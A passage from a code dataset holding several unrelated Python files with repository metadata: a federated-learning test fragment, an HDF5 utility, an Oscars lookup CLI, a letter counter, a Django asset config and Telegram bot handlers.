test_obj.test_homo_split_points()\n # test_obj.test_homo_split_points(is_sparse=True)\n test_obj.tearDown()\n", "repo_name": "FederatedAI/FATE", "sub_path": "python/federatedml/feature/binning/test/test_quantile_binning_module/homo_feature_binning_test.py", "file_name": "homo_feature_binning_test.py", "file_ext": "py", "file_size_in_byte": 6914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "federatedml.feature.instance.Instance", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "federatedml.feature.sparse_vector.SparseVector", "line_number": 53, "usage_type": "call"}, {"api_name": "federatedml.feature.instance.Instance", "line_number": 54, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session.parallelize", "line_number": 58, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 58, "usage_type": "name"}, {"api_name": "federatedml.util.consts.ARBITER", "line_number": 65, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 65, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningServer", "line_number": 66, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 66, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningClient", "line_number": 68, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "federatedml.util.consts.FLOAT_ZERO", "line_number": 86, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 86, "usage_type": "name"}, {"api_name": "federatedml.util.consts.ARBITER", "line_number": 101, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 101, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningServer", "line_number": 102, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 102, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningClient", "line_number": 104, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 104, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 130, "usage_type": "call"}, {"api_name": "fate_arch.session.Session", "line_number": 143, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 143, "usage_type": "name"}, {"api_name": "fate_arch.session.computing_session.init_computing", "line_number": 144, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 144, "usage_type": "name"}, {"api_name": "fate_arch.computing.ComputingType.STANDALONE", "line_number": 144, "usage_type": "attribute"}, {"api_name": "fate_arch.computing.ComputingType", "line_number": 144, "usage_type": "name"}, {"api_name": "fate_arch.session.computing_session.init_federation", "line_number": 145, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 145, "usage_type": "name"}]}
+{"seq_id": "3411892478", "text": "import numpy as np\nimport h5py as h5\nfrom typing import Optional, Union, Any\n\nINT_PREFIX = \"packed_int_\"\nFLOAT_PREFIX = \"packed_float_\"\n\n\ndef pack_key(k):\n if isinstance(k, int):\n return \"%s%i\" % (INT_PREFIX, k)\n elif isinstance(k, float):\n return \"%s%f\" % (FLOAT_PREFIX, k)\n else:\n return k\n\n\ndef unpack_key(k):\n if isinstance(k, str):\n if k.startswith(INT_PREFIX):\n return int(k[len(INT_PREFIX) :])\n if k.startswith(FLOAT_PREFIX):\n return float(k[len(FLOAT_PREFIX) :])\n return k\n else:\n return k\n\n\ndef pack_dataset(\n h5_file: Union[h5.File, h5.Group],\n data_dict: dict[Any, Any],\n compression: Optional[str] = None,\n):\n \"\"\"Takes data organized in a python dict, and stores it in the given hdf5\n with the same structure. Keys are converted to strings to comply to hdf5\n group naming convention. In `unpack_hdf`, if the key is prefixed as a packed\n number, it will be converted back from string.\"\"\"\n\n def rec(data, grp):\n for k, v in data.items():\n k = pack_key(k)\n\n if type(v) is dict:\n if k in grp:\n rec(v, grp[k])\n else:\n rec(v, grp.create_group(k))\n elif isinstance(v, (float, int, str, np.integer)): # type: ignore\n grp.create_dataset(k, data=v) # can't compress scalars\n elif v is not None:\n grp.create_dataset(k, data=v, compression=compression)\n\n rec(data_dict, h5_file)\n\n\ndef pack_hdf(pth, data_dict, compression: Optional[str] = None):\n \"\"\"Takes data organized in a python dict, and creates an hdf5 with the\n same structure. Keys are converted to strings to comply to hdf5 group naming\n convention. In `unpack_hdf`, if the key is all digits, it will be converted\n back from string.\"\"\"\n with h5.File(pth + \".h5\", \"w\") as pckg:\n pack_dataset(pckg, data_dict, compression=compression)\n\n\ndef unpack_hdf_rec(group):\n \"\"\"Recursively unpack an hdf5 of nested Groups (and Datasets) to dict.\"\"\"\n return {\n unpack_key(k): v[()] if type(v) is h5.Dataset else unpack_hdf(v)\n for k, v in group.items()\n }\n\n\ndef unpack_hdf(h5_group):\n \"\"\"Unpack an hdf5 of nested Groups (and Datasets) to dict.\"\"\"\n d = {}\n items = [list(h5_group.items())]\n grps = [d]\n while True:\n if len(items) > 0 and len(items[-1]) > 0:\n k, v = items[-1].pop()\n k = unpack_key(k)\n if type(v) is h5.Dataset:\n grps[-1][k] = v[()]\n else:\n grps[-1][k] = {}\n grps.append(grps[-1][k])\n items.append(list(v.items()))\n elif len(items) > 0:\n items.pop()\n grps.pop()\n else:\n break\n return d\n\n\nclass Workspace:\n _data: Union[dict, h5.File]\n\n def __init__(self, data: Union[dict, h5.File], read_only=False):\n self.read_only = read_only\n self._data = data\n self.is_hdf = not (data is dict)\n\n def __setitem__(self, key, item):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n key = pack_key(key) if self.is_hdf else key\n if self.is_hdf and key in self._data:\n try:\n self._data[key][...] = item # type:ignore\n except TypeError: # if new item has a different shape\n del self._data[key]\n self._data[key] = item\n elif self.is_hdf and type(item) is dict:\n if key in self._data:\n del self._data[key]\n pack_dataset(self._data, {key: item}) # type:ignore\n else:\n self._data[key] = item\n\n def __getitem__(self, key):\n if self.is_hdf:\n v = self._data[pack_key(key)]\n if type(v) is h5.Group:\n return Workspace(v, read_only=self.read_only) # type:ignore\n elif type(v) is h5.Dataset and v.shape == ():\n return v[()]\n else:\n return v\n else:\n return self._data[key]\n\n def __repr__(self):\n return repr(self._data)\n\n def __len__(self):\n return len(self._data)\n\n def __delitem__(self, key):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n key = pack_key(key) if self.is_hdf else key\n del self._data[key]\n\n def __contains__(self, k):\n k = pack_key(k) if self.is_hdf else k\n return k in self._data\n\n def __iter__(self):\n return iter(self._data)\n\n def has_key(self, k):\n k = pack_key(k) if self.is_hdf else k\n return k in self._data\n\n def keys(self):\n if self.is_hdf:\n return map(unpack_key, self._data.keys())\n else:\n return self._data.keys()\n\n def values(self):\n return self._data.values()\n\n def items(self):\n if self.is_hdf:\n return map(lambda kv: (unpack_key(kv[0]), kv[1]), self._data.items())\n else:\n return self._data.items()\n\n def create_group(self, key):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n if self.is_hdf:\n if key in self._data:\n del self._data[key]\n return self._data.create_group(key) # type:ignore\n else:\n self._data[key] = {}\n return self._data[key]\n\n def close(self):\n if self.is_hdf:\n self._data.close() # type:ignore\n else:\n print(\"Workspace is backed by a dict, nothing to close.\")\n", "repo_name": "geoffder/ei-balance", "sub_path": "hdf_utils.py", "file_name": "hdf_utils.py", "file_ext": "py", "file_size_in_byte": 5618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 30, "usage_type": "attribute"}, {"api_name": "h5py.Group", "line_number": 30, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 48, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 56, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 61, "usage_type": "call"}, {"api_name": "h5py.Dataset", "line_number": 68, "usage_type": "attribute"}, {"api_name": "h5py.Dataset", "line_number": 82, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 97, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 97, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 99, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 99, "usage_type": "attribute"}, {"api_name": "h5py.Group", "line_number": 125, "usage_type": "attribute"}, {"api_name": "h5py.Dataset", "line_number": 127, "usage_type": "attribute"}]}
+{"seq_id": "22738283446", "text": "#!/usr/bin/env python3 \nimport sys\nimport argparse\nimport subprocess\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport imdb\nimport data\nfrom tabulate import tabulate\nimport pdfkit as pdf\nimport wiki\n\ndef recibeConfig():\n parser = argparse.ArgumentParser(description=''' \n \n 1) Print information regarding any actress, actor or director that \n has been either nominated to or has won an Oscar since 1927 complete, typing name + category (eg. 'Uma Thurman' actress)\n \n 2) Use --year in case you want to check nominees and winners of an specific year (eg, --year=1987)\n\n 3) Use --movie if you wan't to check specific information regading a movie (eg, --movie='The Theory of Everything').\n ''')\n group = parser.add_argument_group('Check a name')\n group.add_argument('Name',\n nargs = '?',\n help='Name of the actor, actress or director',\n #metavar='nombre',\n type = str\n # default=\"\"\n )\n group.add_argument('Category',\n nargs = '?',\n help='director | actor | actress',\n #metavar='categoria',\n type = str\n # default=\"\"\n )\n parser.add_argument('--year',\n nargs='?',\n help='''Select a year to see the complete list of Oscar nominees and winners in categories\n including Best Actress/Actor in leading role, Best Actress/Actor in a \n supporting role and Best Picture''',\n #metavar='anyo',\n type = int\n # default=\"\"\n )\n parser.add_argument('--movie',\n nargs='?',\n help='''Select a movie to see the complete list of Oscar nominees and winners in categories\n including Best Actress/Actor in leading role, Best Actress/Actor in a \n supporting role and Best Picture''',\n #metavar='movie',\n type = str\n # default=\"\"\n )\n \n args = parser.parse_args()\n print(args)\n return args\n\n\n\ndef main():\n # PASO 1 - Recibir flags y estandarizarlos en un dict\n config = recibeConfig()\n df = pd.read_csv('../input/df.csv')\n if config.year is None and config.movie is None:\n if len(df[(df['name'] == config.Name)]) > 0:\n print('\\n')\n urlW = wiki.urlWiki(config.Name)\n soupW = imdb.createSoup(urlW)\n wiki.infoGeneral(soupW)\n print('\\n')\n url = imdb.urlImdb(config.Name)\n soup = imdb.createSoup(url)\n print(imdb.numPeliculas(soup, config.Category))\n print('\\n')\n print(data.resumenPremios(df, config.Name))\n print('\\n')\n pdtabulate=lambda df:tabulate(df,headers='keys',tablefmt='psql')\n print(pdtabulate(data.tablaPremios(df, config.Name)))\n print('\\n')\n print(\" You'll find further information in /output/name\")\n print('\\n\\n\\n')\n dfFilm = imdb.dfFilmografia(soup,config.Category)\n imdb.chartFilmografia(dfFilm)\n else:\n print('\\n\\n{} has not been nominated yet :____(\\n\\nTRY ANOTHER NAME\\n\\n'.format(config.Name))\n \n if config.year is not None:\n if len(df[(df['year_ceremony'] == config.year)]) > 0:\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width', 1000)\n # with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n print(data.resumenYear(df, config.year))\n print('\\n')\n print(\" You'll find further information in /outpu/year\")\n pdf.from_file('../input/resumenYear.html', '../output/year/resumenYear.pdf') \n else:\n print('\\n\\n{} is out of range.\\n\\nPlase select a year from 1927 to 2019\\n\\n'.format(config.year))\n\n if config.movie is not None:\n if len(df[(df['film'] == config.movie)]) > 0:\n print('\\n')\n print('The Oscars information:')\n print('\\n')\n print(data.resumenPelicula(df, config.movie))\n print('\\n')\n urlPeli = imdb.urlImdb(config.movie)\n soupPeli = imdb.createSoup(urlPeli)\n imdb.infoPelicula(soupPeli)\n print(\" You'll find further information in /outpu/movie\")\n print('\\n')\n pdf.from_file('../input/resumenPelicula.html', '../output/movie/resumenPelicula.pdf') \n else:\n print('\\n\\n{} is not among the nominated films.\\n\\nTRY ANOTHER FILM\\n\\n'.format(config.movie))\n\nif __name__==\"__main__\":\n main()\n\n\n", "repo_name": "mariaadradosr/The-Oscars", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "wiki.urlWiki", "line_number": 75, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 76, "usage_type": "call"}, {"api_name": "wiki.infoGeneral", "line_number": 77, "usage_type": "call"}, {"api_name": "imdb.urlImdb", "line_number": 79, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 80, "usage_type": "call"}, {"api_name": "imdb.numPeliculas", "line_number": 81, "usage_type": "call"}, {"api_name": "data.resumenPremios", "line_number": 83, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 85, "usage_type": "call"}, {"api_name": "data.tablaPremios", "line_number": 86, "usage_type": "call"}, {"api_name": "imdb.dfFilmografia", "line_number": 90, "usage_type": "call"}, {"api_name": "imdb.chartFilmografia", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 99, "usage_type": "call"}, {"api_name": "data.resumenYear", "line_number": 101, "usage_type": "call"}, {"api_name": "pdfkit.from_file", "line_number": 104, "usage_type": "call"}, {"api_name": "data.resumenPelicula", "line_number": 113, "usage_type": "call"}, {"api_name": "imdb.urlImdb", "line_number": 115, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 116, "usage_type": "call"}, {"api_name": "imdb.infoPelicula", "line_number": 117, "usage_type": "call"}, {"api_name": "pdfkit.from_file", "line_number": 120, "usage_type": "call"}]}
+{"seq_id": "17986204878", "text": "from curses.ascii import isalpha\r\n\r\ndef countWordInLine(line):\r\n vowels = ('a','e','i','o','u')\r\n vowel,consonant = 0,0\r\n line = line.lower()\r\n for ch in line:\r\n if isalpha(ch) and (ch in vowels):\r\n vowel +=1\r\n elif isalpha(ch) and (ch not in vowels):\r\n consonant +=1\r\n return vowel,consonant\r\n\r\ndef findNonDuplicateWord(filename):\r\n vowel,consonant = 0,0\r\n fileobj = open(filename,'r')\r\n for line in fileobj:\r\n x,y = countWordInLine(line)\r\n vowel +=x\r\n consonant +=y\r\n\r\n return vowel,consonant\r\n\r\ndef main():\r\n filename = input(\"Enter filename : \").strip()\r\n consonants,vowels = findNonDuplicateWord(filename)\r\n print(f'No. of vowels in file : {vowels}')\r\n print(f'No. of consonants in file : {consonants}')\r\n\r\nmain()\r\n\r\n\r\n\r\n", "repo_name": "Yuyi-hao/python-book-solution-", "sub_path": "chapter 14/q11.py", "file_name": "q11.py", "file_ext": "py", "file_size_in_byte": 823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "curses.ascii.isalpha", "line_number": 8, "usage_type": "call"}, {"api_name": "curses.ascii.isalpha", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "71420236008", "text": "from utils.dataService import BaseDataService\nfrom web import models\n\n\nclass ServiceAsset(BaseDataService):\n def __init__(self):\n super().__init__()\n\n self.mainData = models.Asset\n self.condition_config = [\n {\n \"name\": \"cabinet_num\",\n \"caption\": \"机柜号\",\n \"input_type\": \"input\",\n },\n {\n \"name\": \"device_type\",\n \"caption\": \"设备类型\",\n \"input_type\": \"select\",\n \"select_dict\": \"device_type_list\",\n },\n {\n \"name\": \"business_unit\",\n \"caption\": \"业务线\",\n \"input_type\": \"select\",\n \"select_dict\": \"business_unit_list\",\n },\n {\n \"name\": \"idc\",\n \"caption\": \"机房\",\n \"input_type\": \"select\",\n \"select_dict\": \"idc_list\",\n },\n {\n \"name\": \"cabinet_order\",\n \"caption\": \"机柜中序号\",\n \"input_type\": \"input\",\n \"select_dict\": \"\",\n },\n {\n \"name\": \"employee\",\n \"caption\": \"员工\",\n \"input_type\": \"select\",\n \"select_dict\": \"employee_list\",\n },\n {\n \"name\": \"user\",\n \"caption\": \"用户\",\n \"input_type\": \"select\",\n \"select_dict\": \"user_list\",\n },\n {\n \"name\": \"device_status_id\",\n \"caption\": \"设备状态\",\n \"input_type\": \"select\",\n \"select_dict\": \"device_status_list\",\n }\n ]\n self.table_config = [\n {\n \"colname\": \"id\",\n \"caption\": \"Id\",\n \"display\": {\"grid\": 0, \"new\": 0, \"detail\": 0},\n \"edit\": {},\n \"text\": {},\n \"attr\": {},\n \"group\": \"基础信息\",\n },\n {\n \"colname\": \"device_type_id\",\n \"caption\": \"设备类型\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 0, \"type\": \"select\", \"dict\": \"device_type_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@device_type_list\"}, \"align\": \"left\", \"remark\": [\"设备简单分类\", \"不同的设备管理不同\"],},\n \"attr\": {\"kkk\": \"vvv\"},\n \"group\": \"\",\n },\n {\n \"colname\": \"business_unit_id\",\n \"caption\": \"业务线\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"business_unit_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@business_unit_list\"}, \"align\": \"left\", \"remark\": [\"公司主业分类\", \"主要用于资源调度\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"idc_id\",\n \"caption\": \"机房\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"idc_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@idc_list\"}, \"align\": \"left\", \"remark\": [\"设备当前所在机房\", \"物理位置\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"cabinet_num\",\n \"caption\": \"机柜号\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@cabinet_num\"}, \"align\": \"center\", \"remark\": [\"机房机柜\", \"机柜的编号\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"cabinet_order\",\n \"caption\": \"机柜中序号\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@cabinet_order\"}, \"align\": \"center\", \"remark\": [\"机柜中的序号\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"employee_id\",\n \"caption\": \"员工\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"employee_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@employee_list\"}, \"align\": \"left\", \"remark\": [\"当前使用方\", \"\"],},\n \"attr\": {},\n \"group\": \"其他信息\",\n },\n {\n \"colname\": \"user_id\",\n \"caption\": \"用户\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"user_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@user_list\"}, \"align\": \"left\", \"remark\": [\"运维登记方\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"remark\",\n \"caption\": \"备注\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@remark\"}, \"align\": \"left\", \"remark\": [\"\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"device_status_id\",\n \"caption\": \"设备状态\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"device_status_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@device_status_list\"}, \"align\": \"center\", \"remark\": [\"设备的当前状态\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": None,\n \"caption\": \"操作\",\n \"display\": {\"grid\": 1, \"new\": 0, \"detail\": 0},\n \"edit\": {\"enable\": 0, },\n \"text\": {\"content\": \"查看详情 \", \"kwargs\": {\"m\": \"@id\"}, \"align\": \"center\",},\n \"attr\": {},\n \"group\": \"\",\n }\n ]\n self.page_config = {\n \"jsonUrl\": \"asset-json\",\n \"newUrl\": \"asset-new\",\n \"onClick\": \"1\"\n }\n\n # 初始化数据字典\n self.global_dict = {}\n self.global_dict[\"device_status_list\"] = {1: \"上架\", 2: \"上线\", 3: \"离线\", 4: \"下架\", }\n dict_rs = list(models.AssetType.objects.values(\"id\", \"name\"))\n self.global_dict[\"device_type_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.BusinessUnit.objects.values(\"id\", \"name\"))\n self.global_dict[\"business_unit_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.Idc.objects.values(\"id\", \"name\", \"floor\"))\n self.global_dict[\"idc_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [str(item[\"floor\"]) + \"楼-\" + item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.EmployeeInfo.objects.values(\"id\", \"name\"))\n self.global_dict[\"employee_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.UserInfo.objects.values(\"id\", \"username\"))\n self.global_dict[\"user_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"username\"] for item in dict_rs]))\n", "repo_name": "wildmanwang/exerSite", "sub_path": "exerCmdb/web/services/asset.py", "file_name": "asset.py", "file_ext": "py", "file_size_in_byte": 8436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.dataService.BaseDataService", "line_number": 5, "usage_type": "name"}, {"api_name": "web.models.Asset", "line_number": 9, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 9, "usage_type": "name"}, {"api_name": "web.models.AssetType.objects.values", "line_number": 169, "usage_type": "call"}, {"api_name": "web.models.AssetType", "line_number": 169, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 169, "usage_type": "name"}, {"api_name": "web.models.BusinessUnit.objects.values", "line_number": 171, "usage_type": "call"}, {"api_name": "web.models.BusinessUnit", "line_number": 171, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 171, "usage_type": "name"}, {"api_name": "web.models.Idc.objects.values", "line_number": 173, "usage_type": "call"}, {"api_name": "web.models.Idc", "line_number": 173, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 173, "usage_type": "name"}, {"api_name": "web.models.EmployeeInfo.objects.values", "line_number": 175, "usage_type": "call"}, {"api_name": "web.models.EmployeeInfo", "line_number": 175, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 175, "usage_type": "name"}, {"api_name": "web.models.UserInfo.objects.values", "line_number": 177, "usage_type": "call"}, {"api_name": "web.models.UserInfo", "line_number": 177, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 177, "usage_type": "name"}]}
+{"seq_id": "7879568212", "text": "\"\"\"\n Класс направления Текст.\n Идет перенаправление в зависимости от полученного текста.\n\"\"\"\n\nfrom uuid import uuid1\n\nfrom bots.models import Bot, BotAdmin\nfrom edubot.keyboards import admin_kbrd, main_kbrd, plans_kbrd\nfrom edubot.main_classes import BotData, LocalData\nfrom groups.models import Spisok\nfrom plans.models import Plan\n\nfrom .datatypesclass import Observer, Subject\n\n\nclass TextPlan(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'План':\n cur_bot = Bot.objects.get(tg=bot.token)\n cur_user = Spisok.objects.get(chat=local.chat_id)\n groups = cur_user.groupuser.filter(bot=cur_bot)\n plans_info = []\n for group in groups:\n plans = Plan.objects.filter(groupplan=group)\n plans_temp = []\n if plans:\n for plan in plans:\n plans_temp.append({'id': plan.id, 'name': plan.name})\n plans_info.append(\n {'group_id': group.id,\n 'group_name': group.name,\n 'plans': plans_temp}\n )\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Для вас нет плана.',\n }\n if plans_info:\n answer['text'] = 'Выберите тему для работы:'\n answer['reply_markup'] = plans_kbrd(plans_info)\n bot.send_answer(answer)\n\n\nclass TextMessageToTeacher(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Сообщение учителю':\n local.user_edit(state='message_to_teacher')\n admins = local.admins\n number = len(admins)\n text = 'Ваше сообщение получ' + ('ит ' if number == 1 else 'ат:\\n')\n for admin in admins.values():\n text += admin\n text += '\\n'\n answer = {\n 'chat_id': local.chat_id,\n 'text': f'{text}Пишите (только текст):'\n }\n bot.send_answer(answer)\n\n\nclass TextMessageToAdmins(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Сообщение админам':\n local.user_edit(state='message_to_admins')\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Пишите (только текст):'\n }\n bot.send_answer(answer)\n\n\nclass TextSupport(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Техподдержка':\n local.user_edit(state='support')\n answer = {\n 'chat_id': local.chat_id,\n 'text': '''Сообщите, о каком боте идет речь и суть проблемы.\n Пишите сообщение в техподдержку (только текст):'''\n }\n bot.send_answer(answer)\n\n\nclass TextGoToPanel(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state == 'Администрировать':\n pin = str(uuid1())\n BotAdmin.objects.filter(chat=local.chat_id).update(pin=pin)\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Для входа в админпанель нажмите кнопку:',\n 'reply_markup': admin_kbrd(local.chat_id, pin),\n }\n bot.send_answer(answer)\n\n\nclass TextHaHaHa(Observer):\n def update(self, subject: Subject, bot: BotData, local: LocalData) -> None:\n if subject._state not in [\n 'План', 'Сообщение учителю', 'Администрировать',\n 'Сообщение админам', 'Техподдержка']:\n answer = {\n 'chat_id': local.chat_id,\n 'text': 'Ага... и вам приветик!',\n 'reply_markup': main_kbrd(local.chat_id),\n }\n bot.send_answer(answer)\n", "repo_name": "afoninsb/StudyBotPy", "sub_path": "botproject/edubot/datatypes_classes/textlevel.py", "file_name": "textlevel.py", "file_ext": "py", "file_size_in_byte": 4427, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datatypesclass.Observer", "line_number": 17, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 18, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 18, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 18, "usage_type": "name"}, {"api_name": "bots.models.Bot.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "bots.models.Bot.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bots.models.Bot", "line_number": 20, "usage_type": "name"}, {"api_name": "groups.models.Spisok.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "groups.models.Spisok.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "groups.models.Spisok", "line_number": 21, "usage_type": "name"}, {"api_name": "groups.models", "line_number": 22, "usage_type": "name"}, {"api_name": "groups.models", "line_number": 24, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 25, "usage_type": "name"}, {"api_name": "plans.models.Plan.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "plans.models.Plan.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "plans.models.Plan", "line_number": 25, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 27, "usage_type": "name"}, {"api_name": "plans.models", "line_number": 28, "usage_type": "name"}, {"api_name": "edubot.keyboards.plans_kbrd", "line_number": 41, "usage_type": "call"}, {"api_name": "datatypesclass.Observer", "line_number": 45, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 46, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 46, 